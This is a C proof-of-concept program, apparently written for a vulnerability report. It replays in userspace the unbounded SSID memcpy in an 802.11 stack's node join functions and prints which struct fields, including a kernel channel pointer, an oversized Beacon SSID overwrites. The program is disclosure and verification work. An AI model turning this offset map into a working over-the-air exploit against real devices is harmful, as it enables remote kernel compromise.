/*
 * DF-0326 - Code-level proof of the unbounded SSID heap overflow in
 *           ieee80211_node.c (ieee80211_sta_join :815-816 and
 *           ieee80211_init_neighbor :1521-1522).
 *
 * This program reproduces, in userspace, the EXACT memcpy that the two
 * vulnerable kernel functions perform, against a faithful replica of the
 * tail of `struct ieee80211_node` (copied verbatim, field-by-field, from
 * sys/netproto/802_11/ieee80211_node.h:176-196). It computes the real
 * offsetof() of every field after ni_essid and shows which fields a crafted
 * Beacon with ssid_len = 192 (and 255) overwrites -- in particular the
 * `struct ieee80211_channel *ni_chan` kernel POINTER.
 *
 * The live KVM guest has no 802.11 radio, so the kernel receive path cannot
 * be driven here. This program is the rigorous, line-accurate substitute:
 * if the kernel compiles this struct the same way (it does -- same types,
 * same order, LP64), the offsets printed below are exactly where an attacker-
 * controlled Beacon SSID lands inside a live `struct ieee80211_node`.
 *
 * Build:  cc -O2 -Wall -o node_overflow node_overflow.c
 * Run:    ./node_overflow
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* ---- constants lifted verbatim from sys/netproto/802_11/ieee80211.h ---- */
#define IEEE80211_ADDR_LEN      6
#define IEEE80211_NWID_LEN      32      /* ieee80211.h:199 */
#define IEEE80211_RATE_MAXSIZE  15      /* _ieee80211.h:375 */

/* ---- ieee80211_rateset, verbatim from _ieee80211.h:377-380 ---- */
struct ieee80211_rateset {
    uint8_t  rs_nrates;
    uint8_t  rs_rates[IEEE80211_RATE_MAXSIZE];
};

/*
 * Tail of `struct ieee80211_node` -- the fields declared at
 * ieee80211_node.h:176-196, copied field-by-field with identical types and
 * order. `void *` stands in for the opaque `struct ieee80211_channel *`
 * (same 8-byte width on LP64). Everything below ni_esslen is what an SSID
 * overflow walks into.
 */
struct node_tail {
    /* header (ieee80211_node.h:176-184) */
    uint8_t  ni_macaddr[IEEE80211_ADDR_LEN];        /* :177 */
    uint8_t  ni_bssid[IEEE80211_ADDR_LEN];          /* :178 */
    union {                                         /* :181-184 ni_tstamp */
        uint8_t  data[8];
        uint64_t tsf;
    } ni_tstamp;
    uint16_t ni_intval;                             /* :185 */
    uint16_t ni_capinfo;                            /* :186 */
    /* --- overflow starts touching here --- */
    uint8_t  ni_esslen;                             /* :187 */
    uint8_t  ni_essid[IEEE80211_NWID_LEN];          /* :188  <-- sink */
    struct ieee80211_rateset ni_rates;              /* :189 */
    void *   ni_chan;                               /* :190  <-- POINTER */
    uint16_t ni_fhdwell;                            /* :191 */
    uint8_t  ni_fhindex;                            /* :192 */
    uint16_t ni_erp;                                /* :193 */
    uint16_t ni_timoff;                             /* :194 */
    uint8_t  ni_dtim_period;                        /* :195 */
    uint8_t  ni_dtim_count;                         /* :196 */
    uint8_t  ni_meshidlen;                          /* :199 (next region) */
    uint8_t  ni_meshid[32];                         /* :200 */
};

#define OFF(f)  ((size_t)offsetof(struct node_tail, f))
#define ESSID_OFF  OFF(ni_essid)

/* Describe a field that lives within the overflow window. */
struct field_desc {
    const char *name;
    size_t      off;        /* offset from start of node_tail */
    size_t      size;
    int         is_ptr;
};

static const struct field_desc fields[] = {
    { "ni_esslen",       OFF(ni_esslen),       1,  0 },
    { "ni_essid[32]",    OFF(ni_essid),        32, 0 },
    { "ni_rates",        OFF(ni_rates),        sizeof(struct ieee80211_rateset), 0 },
    { "  ni_rates.rs_nrates", OFF(ni_rates),   1,  0 },
    { "  ni_rates.rs_rates[15]", OFF(ni_rates)+1, 15, 0 },
    { "ni_chan (POINTER)", OFF(ni_chan),        sizeof(void *), 1 },
    { "ni_fhdwell",      OFF(ni_fhdwell),      2,  0 },
    { "ni_fhindex",      OFF(ni_fhindex),      1,  0 },
    { "ni_erp",          OFF(ni_erp),          2,  0 },
    { "ni_timoff",       OFF(ni_timoff),       2,  0 },
    { "ni_dtim_period",  OFF(ni_dtim_period),  1,  0 },
    { "ni_dtim_count",   OFF(ni_dtim_count),   1,  0 },
    { "ni_meshidlen",    OFF(ni_meshidlen),    1,  0 },
    { "ni_meshid[32]",   OFF(ni_meshid),       32, 0 },
};

static void dump_overflow(unsigned ssid_len)
{
    /* allocate the node tail, zero it, plant sentinels in the post-essid fields */
    struct node_tail *n = calloc(1, sizeof(*n));
    if (!n) { perror("calloc"); exit(1); }

    /* Mark every byte after ni_essid with a sentinel so we can see clobbering. */
    unsigned char *base = (unsigned char *)n;
    for (size_t i = OFF(ni_rates); i < sizeof(*n); i++)
        base[i] = 0xA5;

    /* Record the pre-overflow ni_chan value (simulating a real channel ptr). */
    n->ni_chan = (void *)0xDEADBEEF12345678UL;

    /*
     * EXACTLY what ieee80211_init_neighbor does at ieee80211_node.c:1521-1522
     *   ni->ni_esslen = sp->ssid[1];
     *   memcpy(ni->ni_essid, sp->ssid + 2, sp->ssid[1]);
     * and what ieee80211_sta_join does at ieee80211_node.c:815-816
     *   ni->ni_esslen = se->se_ssid[1];
     *   memcpy(ni->ni_essid, se->se_ssid+2, ni->ni_esslen);
     * ssid_len == sp->ssid[1] == se->se_ssid[1], attacker-controlled 0..255.
     */
    uint8_t beacon_ssid[257];
    memset(beacon_ssid, 0xCC, sizeof(beacon_ssid)); /* attacker-controlled bytes */
    beacon_ssid[1] = (uint8_t)ssid_len;             /* the length byte */

    n->ni_esslen = beacon_ssid[1];
    memcpy(n->ni_essid, beacon_ssid + 2, n->ni_esslen);   /* <-- the bug */

    printf("\n=== overflow with ssid_len = %u (ni_esslen now %u) ===\n",
           ssid_len, n->ni_esslen);
    printf("  ni_essid sink is %zu bytes wide; memcpy wrote %u bytes -> %u byte OVERFLOW\n",
           (size_t)32, ssid_len,
           ssid_len > 32 ? ssid_len - 32 : 0);

    /* Show, per field, whether it was hit and (for the pointer) its new value. */
    for (size_t i = 0; i < sizeof(fields)/sizeof(fields[0]); i++) {
        const struct field_desc *f = &fields[i];
        /* skip sub-field lines for the "hit" tally */
        if (f->name[0] == ' ') continue;
        size_t end = f->off + f->size;
        size_t ov_start = ESSID_OFF;            /* overflow begins past essid */
        size_t ov_end   = ESSID_OFF + ssid_len; /* where attacker bytes end   */
        int clobbered = (end > ov_start + 32) && (f->off < ov_end) && (f->off >= OFF(ni_rates));
        if (f->off == OFF(ni_essid)) {
            printf("  %-22s off=%-4zu size=%-2zu  [SINK] %s\n",
                   f->name, f->off, f->size,
                   ssid_len > 32 ? "overflows past end" : "fits");
            continue;
        }
        if (f->is_ptr) {
            void *newv = *(void **)(base + f->off);
            printf("  %-22s off=%-4zu size=%-2zu  %s  ptr=%p%s\n",
                   f->name, f->off, f->size,
                   clobbered ? "CLOBBERED" : "intact   ",
                   newv,
                   clobbered ? "  <-- ATTACKER-CONTROLLED KERNEL POINTER" : "");
        } else {
            printf("  %-22s off=%-4zu size=%-2zu  %s\n",
                   f->name, f->off, f->size,
                   clobbered ? "CLOBBERED" : "intact   ");
        }
    }

    /* Hex dump of the bytes that landed on ni_chan (the dangerous pointer). */
    if (ssid_len > 32) {
        size_t chan_off = OFF(ni_chan);
        size_t ov_end   = ESSID_OFF + ssid_len;
        if (chan_off < ov_end) {
            printf("  ni_chan bytes after overflow (offset %zu): ", chan_off);
            for (size_t i = 0; i < sizeof(void *) && chan_off + i < sizeof(*n); i++)
                printf("%02x", base[chan_off + i]);
            printf("   <- %zu/8 bytes of the channel pointer are attacker-controlled\n",
                   chan_off + sizeof(void*) <= ov_end ? sizeof(void*) : (ov_end - chan_off));
        } else {
            printf("  ni_chan at offset %zu is BEYOND this ssid_len (%zu) -> not reached\n",
                   chan_off, ov_end);
        }
    }

    free(n);
}

int main(void)
{
    printf("DF-0326: ieee80211_node SSID heap overflow -- code-level proof\n");
    printf("struct node_tail size = %zu bytes (LP64)\n", sizeof(struct node_tail));
    printf("Offsets (from start of node_tail):\n");
    for (size_t i = 0; i < sizeof(fields)/sizeof(fields[0]); i++) {
        if (fields[i].name[0] == ' ') continue;
        printf("  %-22s off=%-4zu size=%-2zu%s\n",
               fields[i].name, fields[i].off, fields[i].size,
               fields[i].is_ptr ? "  (kernel POINTER)" : "");
    }
    printf("\nni_essid -> ni_chan distance = %zu bytes\n", OFF(ni_chan) - OFF(ni_essid));
    printf("=> an SSID of length >= %zu fully overwrites ni_chan.\n",
           (OFF(ni_chan) - OFF(ni_essid)) + sizeof(void *));

    dump_overflow(32);    /* exact-fit, no overflow -- the legitimate max */
    dump_overflow(48);    /* reaches the start of ni_chan */
    dump_overflow(56);    /* fully covers ni_chan + ni_fhdwell */
    dump_overflow(192);   /* the finding's cited payload */
    dump_overflow(255);   /* the absolute maximum ssid[1] byte */

    printf("\nVERDICT: ni_essid[32] is overflowed by any Beacon whose SSID IE\n");
    printf("length byte exceeds 32. ni_rates (offset %zu) and the ni_chan kernel\n",
           OFF(ni_rates) - OFF(ni_essid));
    printf("POINTER (offset %zu from ni_essid) are both attacker-writable.\n",
           OFF(ni_chan) - OFF(ni_essid));
    return 0;
}
